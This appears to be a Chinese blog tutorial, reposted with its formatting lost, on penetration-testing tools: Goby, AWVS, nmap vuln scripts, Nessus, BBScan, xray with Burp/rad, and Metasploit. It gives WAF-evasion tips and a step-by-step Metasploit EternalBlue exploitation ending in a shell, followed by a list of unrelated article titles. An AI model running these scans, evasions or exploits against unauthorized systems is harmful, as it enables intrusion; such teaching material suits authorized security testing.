当前位置：首页 > article >正文

肝了三天三夜！最详尽的漏洞扫描工具实战笔记

article 2026/4/27 0:27:21

GobyAWVS 漏洞扫描提示提示本文里面很多工具都是网址还有站长之家之类的csdn一直判断成暗链可以去我自己博客查看完整全文多说一句csdn对网安真的不友好全文链接都不让放。。。》[好淘云]《goby 和 AWVS 简介Goby 是针对目标企业梳理最全面的工具同构 goby 可以清晰的扫描出 ip 地址开放的端口以及端口对应的服务于此同时会根据开放的端口及应用进行实战化的测试并不在乎他的中低危害漏洞而更在乎的是它能直接 get shell 的漏洞AWVS 是针对 web 的轻量级的漏洞扫描工具。也就是根据我们提供的被扫描地址快速的扫描出其所有的漏洞包含高中低及信息泄露等漏洞。前戏下载 goby 和 awvs建议下载红队专版更强大goby 下载 awvs 的插件将 awvs 的 api 添加到 goby 中下载 npcap红队专版 goby 下载链接麻烦看下文章开头在 goby 中输入 ip 或者域名开始扫描一般是直接将子域名爆破出来直接全部加进去扫描结束后点击右边【Web 检测】左侧漏洞直接查看 goby 扫描出来的漏洞其实一般这个就够用了点击 awvs 按钮awvs 页面看到正在扫描goby 页面生成模板awvs 绕过 waf可以通过修改扫描速度和修改 user-agent 头来绕过 wafnmap需要常更新 nampwindowskali执行命令 sudo apt-get install nmap下载 vulscanwindowslinuxln -spwd/scipag_vulscan /usr/share/nmap/scripts/vulscan也可以之间下到 windows 中然后转移到 kali 里面 /usr/share/nmap/scripts/ 里面更新漏洞库:将下列文件下载下来放进 /vulscan/ 文件夹中看文章开头搜索原文。。。下载 nmap-vulnerswindows访问文章开头查看原文下载并放进 nmap\scripts\nmap-vulners*linuxcd /usr/share/nmap/scripts/git clone https://github.com/vulnersCom/nmap-vulners.git也可以之间下到 windows 中然后转移到 kali 里面 /usr/share/nmap/scripts/ 里面运行使用使用 vulscan 扫描推荐nmap -sV --scriptvulscan/vulscan.nse 192.168.242.137好像 windows 更多使用 nmap-vulners 扫描nmap -sV --scriptnmap-vulners/vulners.nse 192.168.242.137Nessus下载参考链接windows找了将近四天感觉最好的了主要为以下三步记一个遇到的问题浏览器打不开解决方法调整键盘为英文输入状态点击页面内的刷新按钮刷新一下页面然后用鼠标点击一下当前页面任意位置紧接着在当前页面使用键盘直接输入thisisunsafe 即可不是在地址栏输入就直接敲键盘就行了。使用New ScanBasic Network ScanBasic Network Scan 为简易的扫描一般用这个就够了。Advanced Scan 为在不使用任何建议的情况下配置扫描。配置基础信息 settings配置账号密码如果网站有账号密码需要配置 Credentials选择插件 plugins保存 save点击 ”” 进行扫描BBScan先通过 GitHub 下载 BBScan2安装库pip install -r requirements.txt扫描单个目标python BBScan.py --host [url]从文件导入目标python BBScan.py -f urls.txt参数Targets:--host[HOST[HOST...]]Scan several hosts fromcommandline-fTargetFile Load new line delimited targets from TargetFile-dTargetDirectory Load all *.txt files from TargetDirectory--crawlerCrawlDirectory Load all *.log crawl files from CrawlDirectory--networkMASK Scan all Target/MASK neighbour hosts, should be an integer between8and31HTTP SCAN:--rule[RuleFileName[RuleFileName...]]Import specified rule files only. -n, --no-crawl No crawling, sub folders will not be processed -nn, --no-check404 No HTTP404existence check--fullProcess all sub directories Scripts SCAN: --scripts-only Scan with user scripts only--script[ScriptName[ScriptName...]]Execute specified scripts only --no-scripts Disable all scripts CONCURRENT:-pPROCESS Num of processes running concurrently,30by default-tTHREADS Num of scan threadsforeach scan process,3by default OTHER:--proxyProxy Set HTTP proxy server--timeoutTimeout Max scan minutesforeach target,10by default-mdSave scan report as markdownformat--save-ports PortsDataFile Saveopenports to PortsDataFile--debugShow verbose debug info -nnn, --no-browser Do notopenweb browser to view report-vshow programs version number andexitxray工具下载地址所有工具不用百度限速云盘也可自行查找。好像破解工具只能用于 xray1.3.3使用下载下来先双击 xray_windows_amd64.exe然后 powershell 中运行.\xray_windows_amd64.exe genca 生成证书双击证书进行配置并配置代理127.0.0.1:7777windows 中使用时使用管理员模式运行 cmd或者使用 powershell。常用使用 HTTP 代理进行被动扫描xray_windows_amd64.exe webscan --listen 127.0.0.1:7777 --html-output ming.html其他使用基础爬虫漏洞扫描xray_windows_amd64.exe webscan --basic-crawler http://example.com --html-output xxx.html快速测试单个 url, 无爬虫xray_windows_amd64.exe webscan --url http://example.com/?ab --html-output single-url.html其中未选择指定模块xray 默认全部扫描–html 以 html格式输出ming.html输出的网页也可以直接用图形化页面super-xray-1.7-system-jre与 burp 联动bp 配置在常规的抓包基础上burp 再配置一个下游的代理。将流量抓发给 xray 进行扫描。这里 bp 将流量抓发到本机的 7777 端口重点必须将 burp 中的“Set “Connection close”on incoming requests when using HTTP/1”取消勾选要不然 burp 会自动修改 neaders 中的 connection 的内容然后开启 xray 即可与 rad 联动附上一个 rad 下载地址(上面网盘里面也有)rad 也为长亭科技开发的一款目录爬取工具因为 xray 自动化爬取功能欠佳所以结合 rad 可以更高效的自动爬取。注意rad 只是爬取目标的目录不爬取子域1对单个域名监听先 xary 开启代理监听xray_windows_amd64.exe webscan –listen 127.0.0.1:7777 –html-output proxy.htmlrad 对目标进行爬取rad_windows_amd64.exe -t http://example.com -http-proxy 127.0.0.1:7777这样 rad 爬取的结果会自动转给 xray 进行扫描2使用脚本对多个域名监听使用python 1.py -r a.txt -o b.txt- r 为域名- o 为输出importargparseimporttimeparserargparse.ArgumentParser()txtNamestr(int(time.time())).txtparser.add_argument(-r,helpEnter the file you want to generate)parser.add_argument(-o,typestr,defaulttxtName,helpPlease enter the name of the file you want to output. Default istxtName)argsparser.parse_args()fopen(args.r,r)dataf.readlines()aforiindata: a; .\\rad_windows_amd64.exe -t {} --json abs.json --index.format(i.strip())f.close()fopen(args.o,w)f.write(a)f.close()同理甚至可以 xrayrad 和 burp 三者联动在这里我就不尝试了。MSFMetasploit FrameworkMSF 是一款 kali 自带漏洞利用及攻击程序含有三大模块msfconsole最常用的利用模块 msweb是 MSF 的图形化接口 msfupdate用于 MSF 的更新建议使用前先更新以永恒之蓝为例运行:msfconsole查找漏洞:search ms17-010利用:use exploit/windows/smb/ms17_010_eternalblue查看所需 payload:show options设置 payloadset RHOSTS 192.168.242.137开始攻击run反弹 shellshell浏览器直接搜索如 CVE-2008-4250查看漏洞公布平台等等。。。写在最后漏洞扫描工具只是我们渗透测试的第一步工具是死的人是活的。后续不管是进行内网渗透还是漏洞复现一个稳定、安全的测试环境如 VPS/ 云服务器是必不可少的。如果这篇文章对你有帮助欢迎点赞收藏有什么问题也可以在评论区交流。

肝了三天三夜！最详尽的漏洞扫描工具实战笔记

相关文章：

肝了三天三夜！最详尽的漏洞扫描工具实战笔记

宝藏网站推荐：云服务器特惠与网安学习资源的一站式聚合平台

广汽全球化战略升级，加速迈入中国汽车出海主力阵营 | 美通社头条

世毫九理论体系｜二十门基础学科基石清单（供世毫九研究学者指南）

AI 能精准发现安全漏洞，漏洞修复的责任边界如何界定

高效率的粉碎者：HPH高压均质机构造全拆解

不花一分钱，10分钟搞定，2026销售录音总结怎么写每月省18小时多拿18成单率

python signal

2026最新亲测3款自动生成会议纪要免费神器，10分钟出稿好用到哭！

MCP AI推理配置紧急升级通知：CVE-2024-MCP-08已曝，未配置memory_limit_policy的实例存在RCE风险

远程容器开发环境安全加固指南（含CVE-2023-XXXX漏洞规避方案与RBAC最小权限实践）

量子-经典混合编排难题全解析，基于MCP 2026标准的4类典型故障诊断与容错加固指南

Docker运行AI模型必踩的3个安全雷区：从容器逃逸到模型窃取的全链路防护指南

PyTorch实现放疗剂量引擎：深度学习与医学物理结合

PikaScript：轻量级Python引擎在MCU上的实现与应用

Cherry MX键帽3D模型库：解决个性化键盘制造的标准化方案

免费快速备份QQ空间：GetQzonehistory完整指南

[具身智能-457]：为什么数据标准文件不直接生成yolo的标签文件的格式，还需要专门的转化？

边缘计算中VLA模型性能优化与ActionFlow实践

数字孪生技术助力运动员心脏健康监测，开启医疗新时代

韩国大学研究团队找到了AI安全防护的“手术刀“

LeapAlign如何从根本上改变图像生成的对齐方式

英国MediaTek研究院找到了让不同AI互相“听懂“彼此的通用翻译层

AI大模型的“文件包“技术，让推理速度提升近20倍

胡桃讲编程｜你知道吗？音乐行业除了 V 家（VOCALOID）还有这些家族！

卷积风格布局器：突破内存墙的硬件加速技术

番茄小说下载器终极指南：如何轻松打造个人数字图书馆

万兴科技加码AI漫剧，旗下万兴剧厂全球首批集成TGI2及可灵AI原生4K

Driver Store Explorer完整指南：免费清理Windows驱动垃圾，轻松释放磁盘空间

【MCP 2026AI推理集成黄金窗口期】：仅剩117天！错过将无法对接2026Q1国家AI算力调度中枢API网关